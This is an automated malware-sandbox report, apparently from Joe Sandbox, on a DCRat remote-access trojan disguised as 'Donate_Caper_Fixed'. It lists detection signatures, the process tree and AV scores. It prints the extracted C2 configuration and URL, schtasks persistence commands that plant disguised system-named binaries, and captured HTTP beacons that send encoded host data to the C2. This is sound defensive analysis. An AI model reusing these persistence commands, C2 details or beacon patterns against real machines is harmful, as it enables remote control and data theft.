Play interactive tour

Edit tour

Analysis Report Donate_Caper_Fixed.bin

Overview

General Information

Sample Name:	Donate_Caper_Fixed.bin (renamed file extension from bin to exe)
Analysis ID:	381112
MD5:	e462b06d82894c0e3efe75250fa64103
SHA1:	084e56438a8d4be566a1fdbeceeba22a7b7e289c
SHA256:	bf6e3cf654738116a14be298176fc12524154ee51f9a2424fa117ee5b47be53a
Tags:	18822540161
Infos:
Most interesting Screenshot:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected DCRat

Creates an autostart registry key pointing to binary in C:\Windows

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

May check the online IP address of the machine

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Sigma detected: System File Execution Location Anomaly

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file contains strange resources

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

Donate_Caper_Fixed.exe (PID: 6844 cmdline: 'C:\Users\user\Desktop\Donate_Caper_Fixed.exe' MD5: E462B06D82894C0E3EFE75250FA64103)

Donate_Caper2021.sfx.exe (PID: 6948 cmdline: 'C:\Users\user\AppData\Roaming\Donate_Caper2021.sfx.exe' MD5: A41B479849B06E8F0DAEA6AAFA5C79BE)

Donate_Caper2021.exe (PID: 7052 cmdline: 'C:\Users\user\AppData\Roaming\Donate_Caper2021.exe' MD5: 8C0FB72C8051214BC9581F4948D04478)

wscript.exe (PID: 6256 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\sessionhostmonitor\RfInN2Wh.vbe' MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cmd.exe (PID: 1556 cmdline: C:\Windows\system32\cmd.exe /c ''C:\sessionhostmonitor\1blSZLIJyv82rdJZrD2y.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sessionhostmonitorSavesruntimeNet.exe (PID: 5168 cmdline: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe MD5: 241F61E88F1F7B6ACF5B199B33CB84B9)

schtasks.exe (PID: 6548 cmdline: 'schtasks' /create /tn 'audiodg' /sc ONLOGON /tr ''C:\Windows\AppReadiness\audiodg.exe'' /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 6812 cmdline: 'schtasks' /create /tn 'msiexec' /sc ONLOGON /tr ''C:\Windows\System32\d3d9on12\msiexec.exe'' /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 6584 cmdline: 'schtasks' /create /tn 'UsoClient' /sc ONLOGON /tr ''C:\Windows\System32\wlanapi\UsoClient.exe'' /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 6712 cmdline: 'schtasks' /create /tn 'HxTsr' /sc ONLOGON /tr ''C:\MSOCache\All Users\{90160000-0115-0409-0000-0000000FF1CE}-C\HxTsr.exe'' /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 6992 cmdline: 'schtasks' /create /tn 'dwm' /sc ONLOGON /tr ''C:\Program Files (x86)\microsoft.net\ADOMD.NET\dwm.exe'' /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 7028 cmdline: 'schtasks' /create /tn 'conhost' /sc ONLOGON /tr ''C:\Program Files (x86)\microsoft sql server\110\Shared\conhost.exe'' /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

conhost.exe (PID: 6280 cmdline: C:\Program Files (x86)\microsoft sql server\110\Shared\conhost.exe MD5: 241F61E88F1F7B6ACF5B199B33CB84B9)

audiodg.exe (PID: 6636 cmdline: C:\Windows\AppReadiness\audiodg.exe MD5: 241F61E88F1F7B6ACF5B199B33CB84B9)

msiexec.exe (PID: 6544 cmdline: C:\Windows\System32\d3d9on12\msiexec.exe MD5: 241F61E88F1F7B6ACF5B199B33CB84B9)

conhost.exe (PID: 7052 cmdline: C:\Program Files (x86)\microsoft sql server\110\Shared\conhost.exe MD5: 241F61E88F1F7B6ACF5B199B33CB84B9)

dwm.exe (PID: 6912 cmdline: C:\Program Files (x86)\microsoft.net\ADOMD.NET\dwm.exe MD5: 241F61E88F1F7B6ACF5B199B33CB84B9)

audiodg.exe (PID: 6104 cmdline: 'C:\Windows\AppReadiness\audiodg.exe' MD5: 241F61E88F1F7B6ACF5B199B33CB84B9)

msiexec.exe (PID: 7148 cmdline: 'C:\Windows\System32\d3d9on12\msiexec.exe' MD5: 241F61E88F1F7B6ACF5B199B33CB84B9)

cleanup

Malware Configuration

Threatname: DCRat

{"AD": false, "DBG": false, "H1": "http://cw51552.tmweb.ru/@=QHb1FmZlRGdjVGdvJHclRXYkBXd39Gbu9Ga0lHc", "H2": "http://cw51552.tmweb.ru/@=QHb1FmZlRGdjVGdvJHclRXYkBXd39Gbu9Ga0lHc", "AK": false, "AS": false, "BCS": 0, "TAG": "", "MUTEX": "DCR_MUTEX-NVedhekJGGo1pqG7l3UT", "AUR": 2, "ASP": "%AppData% - Very Fast"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000001C.00000002.734284162.0000027100001000.00000004.00000001.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001E.00000002.739273160.0000023849951000.00000004.00000001.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000A.00000002.698876300.000002C380001000.00000004.00000001.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000025.00000002.762188942.00000216B8A01000.00000004.00000001.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000012.00000002.909612258.000001D414E61000.00000004.00000001.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000015.00000002.725689848.000001B22A5C1000.00000004.00000001.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000020.00000002.742781923.000001BC12B71000.00000004.00000001.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000021.00000002.729298028.0000026F02331000.00000004.00000001.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000023.00000002.750274756.00000176CC091000.00000004.00000001.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001D.00000002.714934472.0000022709901000.00000004.00000001.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000027.00000002.779854110.00000189D5741000.00000004.00000001.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001F.00000002.740896848.000002334FCB1000.00000004.00000001.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: dwm.exe PID: 6912	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: audiodg.exe PID: 6104	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: sessionhostmonitorSavesruntimeNet.exe PID: 5168	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: msiexec.exe PID: 6544	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: audiodg.exe PID: 6636	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 12 entries

Sigma Overview

System Summary:

Sigma detected: System File Execution Location Anomaly

Show sources

Source: Process started

Author: Florian Roth, Patrick Bareiss: Data: Command: C:\Program Files (x86)\microsoft sql server\110\Shared\conhost.exe, CommandLine: C:\Program Files (x86)\microsoft sql server\110\Shared\conhost.exe, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe, NewProcessName: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe, OriginalFileName: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe, ParentCommandLine: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe, ParentImage: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe, ParentProcessId: 5168, ProcessCommandLine: C:\Program Files (x86)\microsoft sql server\110\Shared\conhost.exe, ProcessId: 6280

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: dwm.exe.6912.30.memstr

Malware Configuration Extractor: DCRat {"AD": false, "DBG": false, "H1": "http://cw51552.tmweb.ru/@=QHb1FmZlRGdjVGdvJHclRXYkBXd39Gbu9Ga0lHc", "H2": "http://cw51552.tmweb.ru/@=QHb1FmZlRGdjVGdvJHclRXYkBXd39Gbu9Ga0lHc", "AK": false, "AS": false, "BCS": 0, "TAG": "", "MUTEX": "DCR_MUTEX-NVedhekJGGo1pqG7l3UT", "AUR": 2, "ASP": "%AppData% - Very Fast"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\MSOCache\All Users\{90160000-0115-0409-0000-0000000FF1CE}-C\HxTsr.exe	Metadefender: Detection: 27%	Perma Link
Source: C:\MSOCache\All Users\{90160000-0115-0409-0000-0000000FF1CE}-C\HxTsr.exe	ReversingLabs: Detection: 42%
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Metadefender: Detection: 27%	Perma Link
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	ReversingLabs: Detection: 42%
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Metadefender: Detection: 27%	Perma Link
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Roaming\DCRatBuild.sfx.exe	ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.sfx.exe	ReversingLabs: Detection: 28%
Source: C:\Windows\AppReadiness\audiodg.exe	Metadefender: Detection: 27%	Perma Link
Source: C:\Windows\AppReadiness\audiodg.exe	ReversingLabs: Detection: 42%
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Metadefender: Detection: 27%	Perma Link
Source: C:\Windows\System32\d3d9on12\msiexec.exe	ReversingLabs: Detection: 42%

Multi AV Scanner detection for submitted file

Show sources

Source: Donate_Caper_Fixed.exe	Virustotal: Detection: 35%			Perma Link
Source: Donate_Caper_Fixed.exe	ReversingLabs: Detection: 31%

Machine Learning detection for dropped file

Show sources

Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Joe Sandbox ML: detected
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Joe Sandbox ML: detected
Source: C:\Windows\System32\wlanapi\UsoClient.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Joe Sandbox ML: detected
Source: C:\MSOCache\All Users\{90160000-0115-0409-0000-0000000FF1CE}-C\HxTsr.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Joe Sandbox ML: detected
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Joe Sandbox ML: detected
Source: C:\Windows\AppReadiness\audiodg.exe	Joe Sandbox ML: detected

Source: Donate_Caper_Fixed.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 216.239.32.21:443 -> 192.168.2.4:49743 version: TLS 1.2

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Donate_Caper2021.exe, 00000004.00000000.654831138.0000000000193000.00000002.00020000.sdmp, Donate_Caper2021.exe.2.dr
Source:	Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: Donate_Caper_Fixed.exe
Source:	Binary string: C:\a\b\d_00000000_\b\out\Win32\Release\starter.pdb{ source: Donate_Caper_Fixed.exe, 00000000.00000003.643185472.0000000004640000.00000004.00000001.sdmp, ks4.021.3.10.391ru_25000.exe.0.dr
Source:	Binary string: C:\a\b\d_00000000_\b\out\Win32\Release\starter.pdb source: Donate_Caper_Fixed.exe, 00000000.00000003.643185472.0000000004640000.00000004.00000001.sdmp, ks4.021.3.10.391ru_25000.exe.0.dr

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_004091E3 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_004091E3
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_0040DB4B SendDlgItemMessageW,DestroyIcon,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SHGetFileInfoW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0040DB4B
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0016A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	4_2_0016A5F4
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0017B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	4_2_0017B8E0
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0018AAA8 FindFirstFileExA,	4_2_0018AAA8

Networking:

May check the online IP address of the machine

Show sources

Source: C:\Windows\AppReadiness\audiodg.exe	DNS query: name: ipinfo.io
Source: C:\Windows\AppReadiness\audiodg.exe	DNS query: name: ipinfo.io

Source: Joe Sandbox View

IP Address: 188.225.40.161 188.225.40.161

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&f06dddd6da1af50c4d2046ad80cd0bd3=7406d4e040947858aca2d8984e05343c&ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23 HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&c1867ab1f3ddc7e3f363557f83cd2055=538f85528a6efd277c2f8b4d2790cd41&c01989751a368db0cb0d8cfc3a15fd41=QZiZGNwE2YhdjZ2cjYzcTMkRTZkFDO5UjNzUDO2gjZkJmMyE2MzAzN&ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23 HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&b7f0a4918b7f29e95f6b0984ebfb745a=%00&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=AZwI2NiVDMyQWZ0AjZzAjZ2IjYiRTOihzMmZDOmJmMhdTNiRGNxMzM HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&1a31b0c70a151fd4aad95e235079a27e=0nIzNXZulGZhVmUwBXQcx1c39GZul2VcxlODJiOigGdhBlIsIiMucjL0IiOi42bpNnclZ1ay92dl1WYyZkIsIib39mbr5WViojIoRXYQ1WYydWZsVGViwiIiojIzBHcB1WYlR3UiwiIud3butmbVJiOiQUSyV2cV1WYlR3UiwiIud3butmbVJiOiIXZzVVbhVGdTJCLi42dv52auVlI6IyZuFGTtFWZ0NlIsIib39mbr5WViojIoRXYQ1WYlR3UiwiIuxlccRzNzITLmhDN4gjYjZ2eu0HMwADMwADMw4SMuAjLwsnI6Iycl52boB3byNWaNJCLi4GXyxVMZFETQNVSExFXuwFXcxlI6IycuVWZyN2UiwiIiojIz1WYjJWZXJCL0kDM0ojINFkUiwiIl52bONzQ1YjUy8kVadlI6ICZyF2biJXZoR3bNJCLiE0Lc5kI6ICbsF2dlJXaGJCLiIXZk5WZmVGRgM3dvRmbpdlI6Iyc1JXa2lGduFkIsISLiojIQlkTBxkIsISTaREVYJiOiM1TJJkIsIieIdEIwQjLyACQgADM2YDIVB1QgITKNRFKlJ3bDBSKShCblRnbJJiOiUWbh5UVQNkIsISQvwlTiojIl1WYOVFUHJye&4fc5eac600fca7de5bfd7671e592aee5=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&690546cdb8ccca9224141f65d5311620=AZwI2NiVDMyQWZ0AjZzAjZ2IjYiRTOihzMmZDOmJmMhdTNiRGNxMzM HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYO